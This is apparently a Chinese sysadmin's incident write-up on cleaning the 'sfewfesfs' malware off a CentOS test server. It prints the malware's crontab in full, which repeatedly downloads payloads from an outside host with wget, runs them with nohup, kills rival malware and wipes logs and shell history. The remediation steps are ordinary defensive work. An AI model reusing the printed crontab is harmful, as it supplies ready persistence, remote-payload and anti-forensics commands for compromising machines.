2014/10/30 21:05

今天下午,同事向我申请机房测试机的权限,我便把一台闲置的CentOS测试机的权限发了这位同事,同事登陆后说机器卡的厉害,我登陆查看才发现机器状态可疑。进而发现了设备中了此病毒,才有了这次解决过程。


我登陆后首先top查看设备负载,4颗CPU负载一直维持在40~50%之间,并且卡的厉害,由于测试机的上联交换机百兆端口,未做限速,因此怀疑网络有状况,遂查看设备出口流量:设备的流量保持在80M。

当天的流量图:

 linux中招病毒sfewfesfs-解决过程_linux

近期的流量图:

linux中招病毒sfewfesfs-解决过程_流量_02

####此时才发现,设备已经中招一个月了,竟然毫无察觉,太失职了!####

#### zabbix 监控还是需要尽快搭建 ####



流量图显示:该设备的上联交换机端口流入很高的流量,即该设备持续向外大量发包;由此判断:设备应该是中毒了。遂进系统展开一系列排查。


#1,

①top

top中,使用shift + m ,shift + t 分别查看内存,cpu消耗最大的进程,发现两个名程分别为sfewfesfs和sfewfesfsh 还有几个名为.sshddxxxxxxxxxx的进程占据了大量的内存及cpu时间。

②find

使用find查找到sfewfesfsh 和 sfewfesfs文件

文件位于/etc/下

尝试删除,不成功。

③lsattr,chattr

lsattr查看文件具有 i 属性,

chattr -i 去除文件的 i 属性,

rm 删除,成功

※几分钟之后,再次top查看又看到这几个进程,因此判断病毒有自我保护的功能,遂查看计划任务

#2,

查看定时任务,病毒写了一系列的定时任务,通过定时任务就可以看到病毒的逻辑。

清空定时任务,

rm -rf /var/spool/cron/root


####下面就是计划任务的内容####

[root@FreeSMonitor ~]# crontab -l | grep -v “#|^$”
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 fdsfsfvff
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 fdsfsfvff
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 whitptabil
*/94 * * * * killall -9 gdmorpen
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/sfewfesfs
*/130 * * * * cd /etc; wget -c http://www.frade8c.com:9162/fdsfsfvff
*/130 * * * * cd /etc; wget -c http://www.frade8c.com:9162/smarvtd
*/140 * * * * cd /etc; wget -c http://www.frade8c.com:9162/rewgtf3er4t
*/140 * * * * cd /etc; wget -c http://www.frade8c.com:9162/whitptabil
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/gdmorpen
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir gdmorpen
*/360 * * * * cd /etc;rm -rf dir fdsfsfvff
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir smarvtd
*/360 * * * * cd /etc;rm -rf dir whitptabil
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir gdmorpen.*
*/1 * * * * cd /etc;rm -rf dir fdsfsfvff.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir smarvtd.*
*/1 * * * * cd /etc;rm -rf dir whitptabil.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/gdmorpen
*/1 * * * * chmod 7777 /etc/fdsfsfvff
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/smarvtd
*/1 * * * * chmod 7777 /etc/whitptabil
*/1 * * * * chmod 7777 /tmp/gfhjrtfyhuf
*/1 * * * * chmod 7777 /tmp/sfewfesfs
*/1 * * * * chmod 7777 /tmp/gdmorpen
*/1 * * * * chmod 7777 /tmp/fdsfsfvff
*/1 * * * * chmod 7777 /tmp/rewgtf3er4t
*/1 * * * * chmod 7777 /tmp/smarvtd
*/1 * * * * chmod 7777 /tmp/whitptabil
*/120 * * * * nohup /tmp/whitptabil > /dev/null 2>&1&
*/120 * * * * nohup /tmp/smarvtd > /dev/null 2>&1&
*/120 * * * * nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
*/120 * * * * nohup /tmp/fdsfsfvff > /dev/null 2>&1&
*/120 * * * * nohup /tmp/gdmorpen > /dev/null 2>&1&
*/120 * * * * nohup /tmp/sfewfesfs > /dev/null 2>&1&
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/fdsfsfvff > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/fdsfsfvff > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/whitptabil > /dev/null 2>&1&
*/95 * * * * nohup /etc/gdmorpen > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
[root@FreeSMonitor ~]#


①病毒主要包含以下模块

gfhjrtfyhuf
sfewfesfs
fdsfsfvff
smarvtd
rewgtf3er4t
whitptabil
gdmorpen

②病毒会做一些例如关闭防火墙的操作来为自己创造运行环境

③病毒会定时下载新的病毒版本做到升级

④病毒会清空各种日志文件以及history记录

⑤并且还发现:不但在/etc/下有病毒的相关内容,在/tmp/下也有

⑥/etc/profile下有客户追加的信息:unset MAILCHECK

[root@FreeSMonitor ~]# cat  /etc/profile | wc -l
1438
[root@FreeSMonitor ~]#

####/etc/profile的56行后全部是unset MAILCHECK的内容####

[root@FreeSMonitor ~]# head -60 /etc/profile
# /etc/profile# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrcpathmunge () {
if ! echo $PATH | /bin/egrep -q “(^|:)$1($|:)” ; then
if [ “$2″ = “after” ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
fi
}# ksh workaround
if [ -z “$EUID” -a -x /usr/bin/id ]; then
EUID=`id -u`
UID=`id -ru`
fi


# Path manipulation
if [ “$EUID” = “0” ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
fi

# No core files by default
ulimit -S -c 0 > /dev/null 2>&1

if [ -x /usr/bin/id ]; then
USER=”`id -un`”
LOGNAME=$USER
MAIL=”/var/spool/mail/$USER”
fi

HOSTNAME=`/bin/hostname`
HISTSIZE=1000

if [ -z “$INPUTRC” -a ! -f “$HOME/.inputrc” ]; then
INPUTRC=/etc/inputrc
fi

export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE INPUTRC

for i in /etc/profile.d/*.sh ; do
if [ -r “$i” ]; then
if [ “$PS1″ ]; then
. $i
else
. $i >/dev/null 2>&1
fi
fi
done

unset i
unset pathmunge
unset MAILCHECK
unset MAILCHECK

[root@FreeSMonitor ~]#


#3,##删除/etc/profile的多余内容##

[root@FreeSMonitor ~]# cat /etc/profile
# /etc/profile# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrcpathmunge () {
if ! echo $PATH | /bin/egrep -q “(^|:)$1($|:)” ; then
if [ “$2″ = “after” ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
fi
}# ksh workaround
if [ -z “$EUID” -a -x /usr/bin/id ]; then
EUID=`id -u`
UID=`id -ru`
fi


# Path manipulation
if [ “$EUID” = “0” ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
fi

# No core files by default
ulimit -S -c 0 > /dev/null 2>&1

if [ -x /usr/bin/id ]; then
USER=”`id -un`”
LOGNAME=$USER
MAIL=”/var/spool/mail/$USER”
fi

HOSTNAME=`/bin/hostname`
HISTSIZE=1000

if [ -z “$INPUTRC” -a ! -f “$HOME/.inputrc” ]; then
INPUTRC=/etc/inputrc
fi

export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE INPUTRC

for i in /etc/profile.d/*.sh ; do
if [ -r “$i” ]; then
if [ “$PS1″ ]; then
. $i
else
. $i >/dev/null 2>&1
fi
fi
done
[root@FreeSMonitor ~]#


#4,检查/etc/,删除可疑文件

#①,看到名为nhgbhhj的可疑文件一并删除
rm -rf /etc/nhgbhhj



参考http://www.linuxquestions.org/qu … malware-4175501872/


#2,用ls -al看到.SSH2隐藏文件,删除
rm -rf /etc/.SSH2


#5,查看rc.local的内容,同样发现一堆类似于计划任务里的启动项,同时还多了一个”/root/dos32″

#因为这台测试机安装的操作系统为32位的,因此就启动了这个程序##

检查/root/下可以文件,一并删除。

#检查其他文件 .bash_history     .bash_logout     .bash_profile     .bashrc ##没有发现问题


[root@FreeSMonitor ~]# ll -a
total 1265296
drwxr-x—  5 root root       4096 Oct 30 23:02 .
drwsrwsrwt 22 root root       4096 Oct 30 18:11 ..
-rw——-  1 root root       1384 May 28  2011 anaconda-ks.cfg
-rw-r–r–  1 root root      10871 Oct 30 22:29 .bash_history
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
-rw-r–r–  1 root root     100652 Sep 13 01:20 dos32.1   ##这应该就是病毒的最新版本的日期–9月13日
-rw-r–r–  1 root root     100652 Sep 13 15:02 dos32.2
-rw-r–r–  1 root root     176166 Sep 13 01:21 dos64.1
-rw-r–r–  1 root root     176166 Sep 13 15:02 dos64.2
drwx——  3 root root       4096 May 28  2011 .gconf
drwx——  2 root root       4096 Oct 30 17:11 .gconfd
-rw-r–r–  1 root root      30500 May 28  2011 install.log
-rw-r–r–  1 root root       4041 May 28  2011 install.log.syslog
-rw——-  1 root root         40 Oct 30 18:05 .lesshst
-rw——-  1 root root        167 Sep 15 13:38 .mysql_history
drwx——  2 root root       4096 Sep 17 15:01 .ssh       ##这个目录下的know_hosts也需要一并删除
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
-rw——-  1 root root       4666 Oct 30 23:02 .viminfo
-rw-r–r–  1 root root      10478 Sep 14 00:05 yum.log
[root@FreeSMonitor ~]#


##清空.ssh/known_hosts##并修改连接过的主机的密码,并做相应的检查##

[root@FreeSMonitor ~]# cat .ssh/known_hosts
119.161.218.249 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAy2Uxh9CqmpcR+F5I1atL8mnuyYA0B1Hjy3SbMjM6y5+KpGpS94b+g9zfsZNg0nmFcGtKJRT9qDbC80R2kUz7sDdLb5LR68q7jTFTxZQ9NeTHIy7ClZ6X63u8N+GHDUBh9is7j6kHqqYUpFuJmIJIcLgU02jLKF5AQqAQ9o/WKoKB979WLTlME4uBf5sDg3c50hSQM9fqisg6ZHLqqszzT447tGXBpoimvqRoMAWIoIn37mO+JzflMBMoVwiamiRV/C/HxusM+ny5MEiVnjGtN1Vhc9k4CRYCudAo/yXTWeGo6tJ0qLVwOZUe1kOInmhN/cxllpQ4Zk0geKfY4CFyXw==
118.145.16.72 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwxXkeIReJswBya5YWxyzx4y4402VeHUnVE2i1EEE59TfXHH8/DpvzU3RBbiOy9lT3C2DCd7gf3lXr19bpuuoEI3V7Hr4bd3BjMi3Hk/GPObzSmpTfF835ixCFlcJoBMqY9pNv81NOjOxF92SpSXLEEeiRj/dBN7sTIFN8Cva823I3DsAwxENioqj1l5xaePvVJB4DvMYmwldRRIDUGBWuYvksEt0BGc3/tJT6ukSozPrVH+vRRwRIgS242UqaBIAZoo+fLUtuWynuKOGg94UHm5kP5Mt/vG9GSXESyWnTt492Ppz3lsgPVhvSjHvozqO0bzhiDsxyG7QJeA2NFPlhQ==
[root@FreeSMonitor ~]# > .ssh/known_hosts
[root@FreeSMonitor ~]# cat .ssh/known_hosts
[root@FreeSMonitor ~]#


重启后还是存在可疑连接,发下来源于/opt/下的一个可疑目录,全部删除。

其中有一个目录挂载到了tmpfs,需要 umount -lf 强行卸载掉。

清空 /tmp/目录 再次重启


##第一次重启后查看网络连接##

[root@FreeSMonitor ~]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State
tcp        0      0 0.0.0.0:514                 0.0.0.0:*                   LISTEN
tcp        0      0 0.0.0.0:60005               0.0.0.0:*                   LISTEN
tcp        0      0 0.0.0.0:873                 0.0.0.0:*                   LISTEN
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN
tcp        0      0 0.0.0.0:443                 0.0.0.0:*                   LISTEN
tcp        0      0 0.0.0.0:15551               0.0.0.0:*                   LISTEN
tcp        0    401 118.145.16.162:37521        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37532        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37539        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37547        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37551        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37550        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37553        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37559        115.231.17.9:56789          ESTABLISHED
tcp        0    401 118.145.16.162:37556        115.231.17.9:56789          ESTABLISHED

tcp        0      0 :::22478                    :::*                        LISTEN
tcp        0      0 ::ffff:118.145.16.162:22478 ::ffff:222.128.187.16:24898 ESTABLISHED
tcp        0     52 ::ffff:118.145.16.162:22478 ::ffff:222.128.187.16:27486 ESTABLISHED
tcp        0      0 ::ffff:118.145.16.162:22478 ::ffff:210.51.190.155:64691 ESTABLISHED
udp        0      0 0.0.0.0:514                 0.0.0.0:*
udp        0      0 0.0.0.0:161                 0.0.0.0:*
udp        0      0 0.0.0.0:162                 0.0.0.0:*
raw   110336      0 0.0.0.0:17                  0.0.0.0:*                   7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     8194   /opt/fsm/var/www/php-cgi.sock
unix  2      [ ACC ]     STREAM     LISTENING     72018  /tmp/ssh-TUYPT10230/agent.10230
unix  2      [ ACC ]     STREAM     LISTENING     8338   /opt/fsm/nms/merlin/ipc.sock
unix  2      [ ACC ]     STREAM     LISTENING     7335   /var/run/acpid.socket
unix  9      [ ]         DGRAM                    7205   /dev/log
unix  2      [ ]         DGRAM                    3530   @/org/kernel/udev/udevd
unix  2      [ ]         DGRAM                    72009
unix  2      [ ]         DGRAM                    47643
unix  3      [ ]         STREAM     CONNECTED     21362
unix  3      [ ]         STREAM     CONNECTED     21361
unix  2      [ ]         DGRAM                    21357
unix  3      [ ]         STREAM     CONNECTED     21147
unix  3      [ ]         STREAM     CONNECTED     21146
unix  3      [ ]         STREAM     CONNECTED     21144
unix  3      [ ]         STREAM     CONNECTED     21143
unix  2      [ ]         DGRAM                    9497
unix  3      [ ]         STREAM     CONNECTED     8414   /opt/fsm/nms/merlin/ipc.sock
unix  3      [ ]         STREAM     CONNECTED     8356
unix  2      [ ]         DGRAM                    8325
unix  3      [ ]         STREAM     CONNECTED     8198
unix  3      [ ]         STREAM     CONNECTED     8197
unix  3      [ ]         STREAM     CONNECTED     8193
unix  3      [ ]         STREAM     CONNECTED     8192
unix  2      [ ]         DGRAM                    7600
unix  2      [ ]         DGRAM                    7213
[root@FreeSMonitor ~]#


通过短时的观察,问题已经解决了,流量也下来了,也没有再次生成病毒文件,暂且在观察一段时间。

 

####出现问题原因####

由于是一台测试机,没有做相应的安全设置,没有修改ssh端口号,并且用户名为root,并且密码复杂程度不够。

####亡羊补牢的内容####

修改ssh端口,禁止root登陆。